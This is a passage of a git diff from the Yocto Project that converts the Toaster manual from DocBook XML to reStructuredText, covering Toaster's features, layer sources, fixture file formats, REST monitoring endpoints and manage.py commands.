+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/toaster-manual/toaster-manual-customization.xsl b/documentation/toaster-manual/toaster-manual-customization.xsl
deleted file mode 100644
index d78694ac14..0000000000
--- a/documentation/toaster-manual/toaster-manual-customization.xsl
+++ /dev/null
@@ -1,28 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-  <xsl:include href="../template/embedded_video.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'toaster-manual-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="A" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/toaster-manual/toaster-manual-intro.rst b/documentation/toaster-manual/toaster-manual-intro.rst
new file mode 100644
index 0000000000..408c6fa3c4
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-intro.rst
@@ -0,0 +1,105 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Introduction
+************
+
+Toaster is a web interface to the Yocto Project's
+:term:`OpenEmbedded Build System`. The interface
+enables you to configure and run your builds. Information about builds
+is collected and stored in a database. You can use Toaster to configure
+and start builds on multiple remote build servers.
+
+.. _intro-features:
+
+Toaster Features
+================
+
+Toaster allows you to configure and run builds, and it provides
+extensive information about the build process.
+
+-  *Configure and Run Builds:* You can use the Toaster web interface to
+   configure and start your builds. Builds started using the Toaster web
+   interface are organized into projects. When you create a project, you
+   are asked to select a release, or version of the build system you
+   want to use for the project builds. As shipped, Toaster supports
+   Yocto Project releases 1.8 and beyond. With the Toaster web
+   interface, you can:
+
+   -  Browse layers listed in the various
+      :ref:`layer sources <toaster-manual/toaster-manual-reference:layer source>`
+      that are available in your project (e.g. the OpenEmbedded Layer Index at
+      http://layers.openembedded.org/layerindex/).
+
+   -  Browse images, recipes, and machines provided by those layers.
+
+   -  Import your own layers for building.
+
+   -  Add and remove layers from your configuration.
+
+   -  Set configuration variables.
+
+   -  Select a target or multiple targets to build.
+
+   -  Start your builds.
+
+   Toaster also allows you to configure and run your builds from the
+   command line, and switch between the command line and the web
+   interface at any time. Builds started from the command line appear
+   within a special Toaster project called "Command line builds".
+
+-  *Information About the Build Process:* Toaster also records extensive
+   information about your builds. Toaster collects data for builds you
+   start from the web interface and from the command line as long as
+   Toaster is running.
+
+   .. note::
+
+      You must start Toaster before the build or it will not collect
+      build data.
+
+   With Toaster you can:
+
+   -  See what was built (recipes and packages) and what packages were
+      installed into your final image.
+
+   -  Browse the directory structure of your image.
+
+   -  See the value of all variables in your build configuration, and
+      which files set each value.
+
+   -  Examine error, warning, and trace messages to aid in debugging.
+
+   -  See information about the BitBake tasks executed and reused during
+      your build, including those that used shared state.
+
+   -  See dependency relationships between recipes, packages, and tasks.
+
+   -  See performance information such as build time, task time, CPU
+      usage, and disk I/O.
+
+For an overview of Toaster shipped with the Yocto Project &DISTRO;
+Release, see the "`Toaster - Yocto Project
+2.2 <https://youtu.be/BlXdOYLgPxA>`__" video.
+
+.. _toaster-installation-options:
+
+Installation Options
+====================
+
+You can set Toaster up to run as a local instance or as a shared hosted
+service.
+
+When Toaster is set up as a local instance, all the components reside on
+a single build host. Fundamentally, a local instance of Toaster is
+suited for a single user developing on a single build host.
+
+.. image:: figures/simple-configuration.png
+   :align: center
+
+Toaster as a hosted service is suited for multiple users developing
+across several build hosts. When Toaster is set up as a hosted service,
+its components can be spread across several machines:
+
+.. image:: figures/hosted-service.png
+   :align: center
diff --git a/documentation/toaster-manual/toaster-manual-intro.xml b/documentation/toaster-manual/toaster-manual-intro.xml
deleted file mode 100644
index e84964c4e1..0000000000
--- a/documentation/toaster-manual/toaster-manual-intro.xml
+++ /dev/null
@@ -1,164 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-intro'>
-<title>Introduction</title>
-
-    <para>
-        Toaster is a web interface to the Yocto Project's
-        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
-        The interface enables you to configure and run your builds.
-        Information about builds is collected and stored in a database.
-        You can use Toaster to configure and start builds on multiple
-        remote build servers.
-    </para>
-
-    <section id='intro-features'>
-        <title>Toaster Features</title>
-
-        <para>
-            Toaster allows you to configure and run builds, and it
-            provides extensive information about the build process.
-            <itemizedlist>
-                <listitem><para id='toaster-build-features'>
-                    <emphasis>Configure and Run Builds:</emphasis>
-                    You can use the Toaster web interface to configure and
-                    start your builds.
-                    Builds started using the Toaster web interface are
-                    organized into projects.
-                    When you create a project, you are asked to select a
-                    release, or version of the build system you want to
-                    use for the project builds.
-                    As shipped, Toaster supports Yocto Project releases 1.8
-                    and beyond.
-                    With the Toaster web interface, you can:
-                    <itemizedlist>
-                        <listitem><para>
-                            Browse layers listed in the various
-                            <link linkend='layer-source'>layer sources</link>
-                            that are available in your project (e.g. the
-                            OpenEmbedded Layer Index at
-                            <ulink url='http://layers.openembedded.org/layerindex/'></ulink>).
-                            </para></listitem>
-                        <listitem><para>
-                            Browse images, recipes, and machines provided by
-                            those layers.
-                            </para></listitem>
-                        <listitem><para>
-                            Import your own layers for building.
-                            </para></listitem>
-                        <listitem><para>
-                            Add and remove layers from your configuration.
-                            </para></listitem>
-                        <listitem><para>
-                            Set configuration variables.
-                            </para></listitem>
-                        <listitem><para>
-                            Select a target or multiple targets to build.
-                            </para></listitem>
-                        <listitem><para>
-                            Start your builds.
-                            </para></listitem>
-                    </itemizedlist>
-                    Toaster also allows you to configure and run your builds
-                    from the command line, and switch between the command line and
-                    the web interface at any time.
-                    Builds started from  the command line appear within a special
-                    Toaster project called "Command line builds".
-                    </para></listitem>
-                <listitem><para id='toaster-analysis-features'>
-                    <emphasis>Information About the Build Process:</emphasis>
-                    Toaster also records extensive information about your builds.
-                    Toaster collects data for builds you start from the web
-                    interface and from the command line as long as Toaster
-                    is running.
-                    <note>
-                        You must start Toaster before the build or it will not
-                        collect build data.
-                    </note></para>
-                    <para>With Toaster you can:
-                    <itemizedlist>
-                        <listitem><para>
-                            See what was built (recipes and packages) and what
-                            packages were installed into your final image.
-                            </para></listitem>
-                        <listitem><para>
-                            Browse the directory structure of your image.
-                            </para></listitem>
-                        <listitem><para>
-                            See the value of all variables in your build
-                            configuration, and which files set each value.
-                            </para></listitem>
-                        <listitem><para>
-                            Examine error, warning, and trace messages to aid
-                            in debugging.
-                            </para></listitem>
-                        <listitem><para>
-                            See information about the BitBake tasks executed
-                            and reused during your build, including those that
-                            used shared state.
-                            </para></listitem>
-                        <listitem><para>
-                            See dependency relationships between recipes,
-                            packages, and tasks.
-                            </para></listitem>
-                        <listitem><para>
-                            See performance information such as build time,
-                            task time, CPU usage, and disk I/O.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            For an overview of Toaster shipped with the Yocto Project &DISTRO;
-            Release, see the
-            "<ulink url='https://youtu.be/BlXdOYLgPxA'>Toaster - Yocto Project 2.2</ulink>"
-            video.
-        </para>
-    </section>
-
-    <section id='toaster-installation-options'>
-        <title>Installation Options</title>
-
-        <para>
-            You can set Toaster up to run as a local instance or as a shared
-            hosted service.
-        </para>
-
-        <para>
-            When Toaster is set up as a local instance, all the components
-            reside on a single build host.
-            Fundamentally, a local instance of Toaster is suited for a single
-            user developing on a single build host.
-        </para>
-
-        <para>
-            <imagedata fileref="figures/simple-configuration.png" align="center" width="6in" depth="1.5in" />
-        </para>
-
-        <para>
-            Toaster as a hosted service is suited for multiple users
-            developing across several build hosts.
-            When Toaster is set up as a hosted service, its components can
-            be spread across several machines:
-        </para>
-
-        <para>
-            <imagedata fileref="figures/hosted-service.png" align="center" width="6in" depth="3.5in" />
-        </para>
-    </section>
-
-<!--THIS EXTRA INFORMATION PROBABLY WILL GO AWAY
-        For additional information on installing and running Toaster, see the
-        "<ulink url='https://wiki.yoctoproject.org/wiki/Toaster#Installation_and_Running'>Installation and Running</ulink>"
-        section of the "Toaster" wiki page.
-        For complete information on the API and its search operation
-        URI, parameters, and responses, see the
-        <ulink url='https://wiki.yoctoproject.org/wiki/REST_API_Contracts'>REST API Contracts</ulink>
-        Wiki page.
-    </para>
--->
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-reference.rst b/documentation/toaster-manual/toaster-manual-reference.rst
new file mode 100644
index 0000000000..bd3a060eee
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-reference.rst
@@ -0,0 +1,662 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Concepts and Reference
+**********************
+
+In order to configure and use Toaster, you should understand some
+concepts and have some basic command reference material available. This
+final chapter provides conceptual information on layer sources,
+releases, and JSON configuration files. Also provided is a quick look at
+some useful ``manage.py`` commands that are Toaster-specific.
+Information on ``manage.py`` commands does exist across the Web and the
+information in this manual by no means attempts to provide a command
+comprehensive reference.
+
+Layer Source
+============
+
+In general, a "layer source" is a source of information about existing
+layers. In particular, we are concerned with layers that you can use
+with the Yocto Project and Toaster. This chapter describes a particular
+type of layer source called a "layer index."
+
+A layer index is a web application that contains information about a set
+of custom layers. A good example of an existing layer index is the
+OpenEmbedded Layer Index. A public instance of this layer index exists
+at http://layers.openembedded.org. You can find the code for this
+layer index's web application at
+http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/.
+
+When you tie a layer source into Toaster, it can query the layer source
+through a
+`REST <http://en.wikipedia.org/wiki/Representational_state_transfer>`__
+API, store the information about the layers in the Toaster database, and
+then show the information to users. Users are then able to view that
+information and build layers from Toaster itself without worrying about
+cloning or editing the BitBake layers configuration file
+``bblayers.conf``.
+
+Tying a layer source into Toaster is convenient when you have many
+custom layers that need to be built on a regular basis by a community of
+developers. In fact, Toaster comes pre-configured with the OpenEmbedded
+Metadata Index.
+
+.. note::
+
+   You do not have to use a layer source to use Toaster. Tying into a
+   layer source is optional.
+
+.. _layer-source-using-with-toaster:
+
+Setting Up and Using a Layer Source
+-----------------------------------
+
+To use your own layer source, you need to set up the layer source and
+then tie it into Toaster. This section describes how to tie into a layer
+index in a manner similar to the way Toaster ties into the OpenEmbedded
+Metadata Index.
+
+Understanding Your Layers
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The obvious first step for using a layer index is to have several custom
+layers that developers build and access using the Yocto Project on a
+regular basis. This set of layers needs to exist and you need to be
+familiar with where they reside. You will need that information when you
+set up the code for the web application that "hooks" into your set of
+layers.
+
+For general information on layers, see the
+":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+section in the Yocto Project Overview and Concepts Manual. For information on how
+to create layers, see the ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _configuring-toaster-to-hook-into-your-layer-source:
+
+Configuring Toaster to Hook Into Your Layer Index
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you want Toaster to use your layer index, you must host the web
+application in a server to which Toaster can connect. You also need to
+give Toaster the information about your layer index. In other words, you
+have to configure Toaster to use your layer index. This section
+describes two methods by which you can configure and use your layer
+index.
+
+In the previous section, the code for the OpenEmbedded Metadata Index
+(i.e. http://layers.openembedded.org) was referenced. You can use
+this code, which is at
+http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/, as a
+base to create your own layer index.
+
+Use the Administration Interface
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Access the administration interface through a browser by entering the
+URL of your Toaster instance and adding "``/admin``" to the end of the
+URL. As an example, if you are running Toaster locally, use the
+following URL::
+
+   http://127.0.0.1:8000/admin
+
+The administration interface has a "Layer sources" section that includes
+an "Add layer source" button. Click that button and provide the required
+information. Make sure you select "layerindex" as the layer source type.
+
+Use the Fixture Feature
+^^^^^^^^^^^^^^^^^^^^^^^
+
+The Django fixture feature overrides the default layer server when you
+use it to specify a custom URL. To use the fixture feature, create (or
+edit) the file ``bitbake/lib/toaster.orm/fixtures/custom.xml``, and then
+set the following Toaster setting to your custom URL:
+
+.. code-block:: xml
+
+   <?xml version="1.0" ?>
+   <django-objects version="1.0">
+      <object model="orm.toastersetting" pk="100">
+         <field name="name" type="CharField">CUSTOM_LAYERINDEX_SERVER</field>
+         <field name="value" type="CharField">https://layers.my_organization.org/layerindex/branch/master/layers/</field>
+      </object>
+   <django-objects>
+
+When you start Toaster for the first time, or
+if you delete the file ``toaster.sqlite`` and restart, the database will
+populate cleanly from this layer index server.
+
+Once the information has been updated, verify the new layer information
+is available by using the Toaster web interface. To do that, visit the
+"All compatible layers" page inside a Toaster project. The layers from
+your layer source should be listed there.
+
+If you change the information in your layer index server, refresh the
+Toaster database by running the following command:
+
+.. code-block:: shell
+
+   $ bitbake/lib/toaster/manage.py lsupdates
+
+
+If Toaster can reach the API URL, you should see a message telling you that
+Toaster is updating the layer source information.
+
+.. _toaster-releases:
+
+Releases
+========
+
+When you create a Toaster project using the web interface, you are asked
+to choose a "Release." In the context of Toaster, the term "Release"
+refers to a set of layers and a BitBake version the OpenEmbedded build
+system uses to build something. As shipped, Toaster is pre-configured
+with releases that correspond to Yocto Project release branches.
+However, you can modify, delete, and create new releases according to
+your needs. This section provides some background information on
+releases.
+
+.. _toaster-releases-supported:
+
+Pre-Configured Releases
+-----------------------
+
+As shipped, Toaster is configured to use a specific set of releases. Of
+course, you can always configure Toaster to use any release. For
+example, you might want your project to build against a specific commit
+of any of the "out-of-the-box" releases. Or, you might want your project
+to build against different revisions of OpenEmbedded and BitBake.
+
+As shipped, Toaster is configured to work with the following releases:
+
+-  *Yocto Project &DISTRO; "&DISTRO_NAME;" or OpenEmbedded "&DISTRO_NAME;":*
+   This release causes your Toaster projects to build against the head
+   of the &DISTRO_NAME_NO_CAP; branch at
+   :yocto_git:`/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP;` or
+   http://git.openembedded.org/openembedded-core/commit/?h=&DISTRO_NAME_NO_CAP;.
+
+-  *Yocto Project "Master" or OpenEmbedded "Master":* This release
+   causes your Toaster Projects to build against the head of the master
+   branch, which is where active development takes place, at
+   :yocto_git:`/cgit/cgit.cgi/poky/log/` or
+   http://git.openembedded.org/openembedded-core/log/.
+
+-  *Local Yocto Project or Local OpenEmbedded:* This release causes your
+   Toaster Projects to build against the head of the ``poky`` or
+   ``openembedded-core`` clone you have local to the machine running
+   Toaster.
+
+Configuring Toaster
+===================
+
+In order to use Toaster, you must configure the database with the
+default content. The following subsections describe various aspects of
+Toaster configuration.
+
+Configuring the Workflow
+------------------------
+
+The ``bldcontrol/management/commands/checksettings.py`` file controls
+workflow configuration. The following steps outline the process to
+initially populate this database.
+
+1. The default project settings are set from
+   ``orm/fixtures/settings.xml``.
+
+2. The default project distro and layers are added from
+   ``orm/fixtures/poky.xml`` if poky is installed. If poky is not
+   installed, they are added from ``orm/fixtures/oe-core.xml``.
+
+3. If the ``orm/fixtures/custom.xml`` file exists, then its values are
+   added.
+
+4. The layer index is then scanned and added to the database.
+
+Once these steps complete, Toaster is set up and ready to use.
+
+Customizing Pre-Set Data
+------------------------
+
+The pre-set data for Toaster is easily customizable. You can create the
+``orm/fixtures/custom.xml`` file to customize the values that go into to
+the database. Customization is additive, and can either extend or
+completely replace the existing values.
+
+You use the ``orm/fixtures/custom.xml`` file to change the default
+project settings for the machine, distro, file images, and layers. When
+creating a new project, you can use the file to define the offered
+alternate project release selections. For example, you can add one or
+more additional selections that present custom layer sets or distros,
+and any other local or proprietary content.
+
+Additionally, you can completely disable the content from the
+``oe-core.xml`` and ``poky.xml`` files by defining the section shown
+below in the ``settings.xml`` file. For example, this option is
+particularly useful if your custom configuration defines fewer releases
+or layers than the default fixture files.
+
+The following example sets "name" to "CUSTOM_XML_ONLY" and its value to
+"True".
+
+.. code-block:: xml
+
+   <object model="orm.toastersetting" pk="99">
+      <field type="CharField" name="name">CUSTOM_XML_ONLY</field>
+      <field type="CharField" name="value">True</field>
+   </object>
+
+Understanding Fixture File Format
+---------------------------------
+
+The following is an overview of the file format used by the
+``oe-core.xml``, ``poky.xml``, and ``custom.xml`` files.
+
+The following subsections describe each of the sections in the fixture
+files, and outline an example section of the XML code. you can use to
+help understand this information and create a local ``custom.xml`` file.
+
+Defining the Default Distro and Other Values
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This section defines the default distro value for new projects. By
+default, it reserves the first Toaster Setting record "1". The following
+demonstrates how to set the project default value for
+:term:`DISTRO`:
+
+.. code-block:: xml
+
+   <!-- Set the project default value for DISTRO -->
+   <object model="orm.toastersetting" pk="1">
+      <field type="CharField" name="name">DEFCONF_DISTRO</field>
+      <field type="CharField" name="value">poky</field>
+   </object>
+
+You can override
+other default project values by adding additional Toaster Setting
+sections such as any of the settings coming from the ``settings.xml``
+file. Also, you can add custom values that are included in the BitBake
+environment. The "pk" values must be unique. By convention, values that
+set default project values have a "DEFCONF" prefix.
+
+Defining BitBake Version
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The following defines which version of BitBake is used for the following
+release selection:
+
+.. code-block:: xml
+
+   <!-- Bitbake versions which correspond to the metadata release -->
+   <object model="orm.bitbakeversion" pk="1">
+      <field type="CharField" name="name">&DISTRO_NAME_NO_CAP;</field>
+      <field type="CharField" name="giturl">git://git.yoctoproject.org/poky</field>
+      <field type="CharField" name="branch">&DISTRO_NAME_NO_CAP;</field>
+      <field type="CharField" name="dirpath">bitbake</field>
+   </object>
+
+.. _defining-releases:
+
+Defining Release
+~~~~~~~~~~~~~~~~
+
+The following defines the releases when you create a new project:
+
+.. code-block:: xml
+
+   <!-- Releases available -->
+   <object model="orm.release" pk="1">
+      <field type="CharField" name="name">&DISTRO_NAME_NO_CAP;</field>
+      <field type="CharField" name="description">Yocto Project &DISTRO; "&DISTRO_NAME;"</field>
+      <field rel="ManyToOneRel" to="orm.bitbakeversion" name="bitbake_version">1</field>
+      <field type="CharField" name="branch_name">&DISTRO_NAME_NO_CAP;</field>
+      <field type="TextField" name="helptext">Toaster will run your builds using the tip of the <a href="http://git.yoctoproject.org/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP;">Yocto Project &DISTRO_NAME; branch</a>.</field>
+   </object>
+
+The "pk" value must match the above respective BitBake version record.
+
+Defining the Release Default Layer Names
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The following defines the default layers for each release:
+
+.. code-block:: xml
+
+   <!-- Default project layers for each release -->
+   <object model="orm.releasedefaultlayer" pk="1">
+      <field rel="ManyToOneRel" to="orm.release" name="release">1</field>
+      <field type="CharField" name="layer_name">openembedded-core</field>
+   </object>
+
+The 'pk' values in the example above should start at "1" and increment
+uniquely. You can use the same layer name in multiple releases.
+
+Defining Layer Definitions
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Layer definitions are the most complex. The following defines each of
+the layers, and then defines the exact layer version of the layer used
+for each respective release. You must have one ``orm.layer`` entry for
+each layer. Then, with each entry you need a set of
+``orm.layer_version`` entries that connects the layer with each release
+that includes the layer. In general all releases include the layer.
+
+.. code-block:: xml
+
+   <object model="orm.layer" pk="1">
+      <field type="CharField" name="name">openembedded-core</field>
+      <field type="CharField" name="layer_index_url"></field>
+      <field type="CharField" name="vcs_url">git://git.yoctoproject.org/poky</field>
+      <field type="CharField" name="vcs_web_url">http://git.yoctoproject.org/cgit/cgit.cgi/poky</field>
+      <field type="CharField" name="vcs_web_tree_base_url">http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%</field>
+      <field type="CharField" name="vcs_web_file_base_url">http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%</field>
+   </object>
+   <object model="orm.layer_version" pk="1">
+      <field rel="ManyToOneRel" to="orm.layer" name="layer">1</field>
+      <field type="IntegerField" name="layer_source">0</field>
+      <field rel="ManyToOneRel" to="orm.release" name="release">1</field>
+      <field type="CharField" name="branch">&DISTRO_NAME_NO_CAP;</field>
+      <field type="CharField" name="dirpath">meta</field>
+   </object> <object model="orm.layer_version" pk="2">
+      <field rel="ManyToOneRel" to="orm.layer" name="layer">1</field>
+      <field type="IntegerField" name="layer_source">0</field>
+      <field rel="ManyToOneRel" to="orm.release" name="release">2</field>
+      <field type="CharField" name="branch">HEAD</field>
+      <field type="CharField" name="commit">HEAD</field>
+      <field type="CharField" name="dirpath">meta</field>
+   </object>
+   <object model="orm.layer_version" pk="3">
+      <field rel="ManyToOneRel" to="orm.layer" name="layer">1</field>
+      <field type="IntegerField" name="layer_source">0</field>
+      <field rel="ManyToOneRel" to="orm.release" name="release">3</field>
+      <field type="CharField" name="branch">master</field>
+      <field type="CharField" name="dirpath">meta</field>
+   </object>
+
+The layer "pk" values above must be unique, and typically start at "1". The
+layer version "pk" values must also be unique across all layers, and typically
+start at "1".
+
+Remote Toaster Monitoring
+=========================
+
+Toaster has an API that allows remote management applications to
+directly query the state of the Toaster server and its builds in a
+machine-to-machine manner. This API uses the
+`REST <http://en.wikipedia.org/wiki/Representational_state_transfer>`__
+interface and the transfer of JSON files. For example, you might monitor
+a build inside a container through well supported known HTTP ports in
+order to easily access a Toaster server inside the container. In this
+example, when you use this direct JSON API, you avoid having web page
+parsing against the display the user sees.
+
+Checking Health
+---------------
+
+Before you use remote Toaster monitoring, you should do a health check.
+To do this, ping the Toaster server using the following call to see if
+it is still alive::
+
+   http://host:port/health
+
+Be sure to provide values for host and port. If the server is alive, you will
+get the response HTML:
+
+.. code-block:: html
+
+   <!DOCTYPE html>
+   <html lang="en">
+      <head><title>Toaster Health</title></head>
+      <body>Ok</body>
+   </html>
+
+Determining Status of Builds in Progress
+----------------------------------------
+
+Sometimes it is useful to determine the status of a build in progress.
+To get the status of pending builds, use the following call::
+
+   http://host:port/toastergui/api/building
+
+Be sure to provide values for host and port. The output is a JSON file that
+itemizes all builds in progress. This file includes the time in seconds since
+each respective build started as well as the progress of the cloning, parsing,
+and task execution. The following is sample output for a build in progress:
+
+.. code-block:: JSON
+
+   {"count": 1,
+    "building": [
+      {"machine": "beaglebone",
+        "seconds": "463.869",
+        "task": "927:2384",
+        "distro": "poky",
+        "clone": "1:1",
+        "id": 2,
+        "start": "2017-09-22T09:31:44.887Z",
+        "name": "20170922093200",
+        "parse": "818:818",
+        "project": "my_rocko",
+        "target": "core-image-minimal"
+      }]
+   }
+
+The JSON data for this query is returned in a
+single line. In the previous example the line has been artificially
+split for readability.
+
+Checking Status of Builds Completed
+-----------------------------------
+
+Once a build is completed, you get the status when you use the following
+call::
+
+   http://host:port/toastergui/api/builds
+
+Be sure to provide values for host and port. The output is a JSON file that
+itemizes all complete builds, and includes build summary information. The
+following is sample output for a completed build:
+
+.. code-block:: JSON
+
+   {"count": 1,
+    "builds": [
+      {"distro": "poky",
+         "errors": 0,
+         "machine": "beaglebone",
+         "project": "my_rocko",
+         "stop": "2017-09-22T09:26:36.017Z",
+         "target": "quilt-native",
+         "seconds": "78.193",
+         "outcome": "Succeeded",
+         "id": 1,
+         "start": "2017-09-22T09:25:17.824Z",
+         "warnings": 1,
+         "name": "20170922092618"
+      }]
+   }
+
+The JSON data for this query is returned in a single line. In the
+previous example the line has been artificially split for readability.
+
+Determining Status of a Specific Build
+--------------------------------------
+
+Sometimes it is useful to determine the status of a specific build. To
+get the status of a specific build, use the following call::
+
+   http://host:port/toastergui/api/build/ID
+
+Be sure to provide values for
+host, port, and ID. You can find the value for ID from the Builds
+Completed query. See the ":ref:`toaster-manual/toaster-manual-reference:checking status of builds completed`"
+section for more information.
+
+The output is a JSON file that itemizes the specific build and includes
+build summary information. The following is sample output for a specific
+build:
+
+.. code-block:: JSON
+
+   {"build":
+      {"distro": "poky",
+       "errors": 0,
+       "machine": "beaglebone",
+       "project": "my_rocko",
+       "stop": "2017-09-22T09:26:36.017Z",
+       "target": "quilt-native",
+       "seconds": "78.193",
+       "outcome": "Succeeded",
+       "id": 1,
+       "start": "2017-09-22T09:25:17.824Z",
+       "warnings": 1,
+       "name": "20170922092618",
+       "cooker_log": "/opt/user/poky/build-toaster-2/tmp/log/cooker/beaglebone/build_20170922_022607.991.log"
+      }
+   }
+
+The JSON data for this query is returned in a single line. In the
+previous example the line has been artificially split for readability.
+
+.. _toaster-useful-commands:
+
+Useful Commands
+===============
+
+In addition to the web user interface and the scripts that start and
+stop Toaster, command-line commands exist through the ``manage.py``
+management script. You can find general documentation on ``manage.py``
+at the
+`Django <https://docs.djangoproject.com/en/2.2/topics/settings/>`__
+site. However, several ``manage.py`` commands have been created that are
+specific to Toaster and are used to control configuration and back-end
+tasks. You can locate these commands in the
+:term:`Source Directory` (e.g. ``poky``) at
+``bitbake/lib/manage.py``. This section documents those commands.
+
+.. note::
+
+   -  When using ``manage.py`` commands given a default configuration,
+      you must be sure that your working directory is set to the
+      :term:`Build Directory`. Using
+      ``manage.py`` commands from the Build Directory allows Toaster to
+      find the ``toaster.sqlite`` file, which is located in the Build
+      Directory.
+
+   -  For non-default database configurations, it is possible that you
+      can use ``manage.py`` commands from a directory other than the
+      Build Directory. To do so, the ``toastermain/settings.py`` file
+      must be configured to point to the correct database backend.
+
+.. _toaster-command-buildslist:
+
+``buildslist``
+--------------
+
+The ``buildslist`` command lists all builds that Toaster has recorded.
+Access the command as follows:
+
+.. code-block:: shell
+
+   $ bitbake/lib/toaster/manage.py buildslist
+
+The command returns a list, which includes numeric
+identifications, of the builds that Toaster has recorded in the current
+database.
+
+You need to run the ``buildslist`` command first to identify existing
+builds in the database before using the
+:ref:`toaster-manual/toaster-manual-reference:\`\`builddelete\`\`` command. Here is an
+example that assumes default repository and build directory names:
+
+.. code-block:: shell
+
+   $ cd ~/poky/build
+   $ python ../bitbake/lib/toaster/manage.py buildslist
+
+If your Toaster database had only one build, the above
+:ref:`toaster-manual/toaster-manual-reference:\`\`buildslist\`\``
+command would return something like the following::
+
+   1: qemux86 poky core-image-minimal
+
+.. _toaster-command-builddelete:
+
+``builddelete``
+---------------
+
+The ``builddelete`` command deletes data associated with a build. Access
+the command as follows:
+
+.. code-block::
+
+   $ bitbake/lib/toaster/manage.py builddelete build_id
+
+The command deletes all the build data for the specified
+build_id. This command is useful for removing old and unused data from
+the database.
+
+Prior to running the ``builddelete`` command, you need to get the ID
+associated with builds by using the
+:ref:`toaster-manual/toaster-manual-reference:\`\`buildslist\`\`` command.
+
+.. _toaster-command-perf:
+
+``perf``
+--------
+
+The ``perf`` command measures Toaster performance. Access the command as
+follows:
+
+.. code-block:: shell
+
+   $ bitbake/lib/toaster/manage.py perf
+
+The command is a sanity check that returns page loading times in order to
+identify performance problems.
+
+.. _toaster-command-checksettings:
+
+``checksettings``
+-----------------
+
+The ``checksettings`` command verifies existing Toaster settings. Access
+the command as follows:
+
+.. code-block:: shell
+
+   $ bitbake/lib/toaster/manage.py checksettings
+
+Toaster uses settings that are based on the database to configure the
+building tasks. The ``checksettings`` command verifies that the database
+settings are valid in the sense that they have the minimal information
+needed to start a build.
+
+In order for the ``checksettings`` command to work, the database must be
+correctly set up and not have existing data. To be sure the database is
+ready, you can run the following:
+
+.. code-block:: shell
+
+   $ bitbake/lib/toaster/manage.py syncdb
+   $ bitbake/lib/toaster/manage.py migrate orm
+   $ bitbake/lib/toaster/manage.py migrate bldcontrol
+
+After running these commands, you can run the ``checksettings`` command.
+
+.. _toaster-command-runbuilds:
+
+``runbuilds``
+-------------
+
+The ``runbuilds`` command launches scheduled builds. Access the command
+as follows:
+
+.. code-block:: shell
+
+   $ bitbake/lib/toaster/manage.py runbuilds
+
+The ``runbuilds`` command checks if scheduled builds exist in the database
+and then launches them per schedule. The command returns after the builds
+start but before they complete. The Toaster Logging Interface records and
+updates the database when the builds complete.
diff --git a/documentation/toaster-manual/toaster-manual-reference.xml b/documentation/toaster-manual/toaster-manual-reference.xml
deleted file mode 100644
index 7440580e7c..0000000000
--- a/documentation/toaster-manual/toaster-manual-reference.xml
+++ /dev/null
@@ -1,836 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-reference'>
-
-<title>Concepts and Reference</title>
-
-    <para>
-        In order to configure and use Toaster, you should understand some
-        concepts and have some basic command reference material available.
-        This final chapter provides conceptual information on layer sources,
-        releases, and JSON configuration files.
-        Also provided is a quick look at some useful
-        <filename>manage.py</filename> commands that are Toaster-specific.
-        Information on <filename>manage.py</filename> commands does exist
